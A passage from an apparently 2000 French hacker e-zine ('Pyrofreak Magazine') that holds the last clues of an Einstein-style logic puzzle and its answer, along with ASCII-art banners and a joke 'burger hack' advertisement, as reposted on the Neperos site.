9. L'homme qui fume des Blend vit a coté de celui qui éleve des chats.
10. La personne qui éleve des chevaux vit a coté du fumeur de Dunhill.
11. L'homme qui fume des Blue Master boit de la biere.
12. L'Allemand fume des Prince.
13. Le Norvégien vit a coté de la maison bleue.
14. L'homme qui fume des Blend a un voisin qui boit de l'eau.
15. Le propriétaire de la maison jaune fume des Dunhill.

NB: C'est normal que ca prenne une quarantaine de minutes si c'est pas plus
pour trouver l'énigme.

La réponse se retrouve à la fin de ce mag.



Pensée: Moi cé moi!
_____ _____ _ ______ ______ __ ___ _________
|: __ _ \ \ \ / / | ____ | / ___ |
| \__ _\ \ \ \/ ; / |; /_ _/ | / / /; |
| ____ __ ___\ \ : / |: _ / | / / : |
|: | / , / |, | \ : \ | :\__/ |
|; | ___/ . / |. | \ ; \ | ; /
|___\ \________/ |___\ \__ ____\ |__________|
____ _ ___ __ ___ ___ ______ __ _______
|: _ _ ;\ | \ \ \ / ;| | | / . /
| | \_______\ |: _\ \_ _\ / /| :| | ;| / /
_| |___ _____ |; |__ ____ / <_| ,| | |/ : /
|_|, ___| |; .\ | __\ \_:__\ / _ | | ;/
|: | |: ` / | :|____ ____ \ / |; | | |\ \
|; | |, |\ \ | ; \ \ ;\ \/ |: | |: | \ \
|___\ |__| \_| |________\ \____\ |____| |___\ \_____\

Crédit: __2





'::-::`
(o o)
ooO--(_)--Ooo-
2000(c) tOUT lES dROITS sONT réSERVÉS à pYROfREAk mAGAZINE






_________________________________________
/ . . . . . \
| . . . . |
| . . |
'-----,----,--.--,----,-----,----,----,-----'
| |) | | | |) | ___| __| |) |
| | | | /| .__. __| /
| |) | | | \| | | | | \
'----'-----'-'--'-----'----'-'--'
,--, ,--, ,--, ,------,--, ,--,
| |_| | / __ \ | | |/ /
| |/ /__\ \| ___| (
| ,-, | __ | | \
| | | | / \ | | |\ |
,-----'--' '--'-- --'------'--' ---'-----,
| |
\_________________________________________/

venez gouter a notre tout nouveau RHOOTER JR

(c) RHOOTER JR is a burger hack trademark

n.b Merci Wyzeman pour le Burger Hack :)


C'est l'Allemand qui élève les poissons

← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT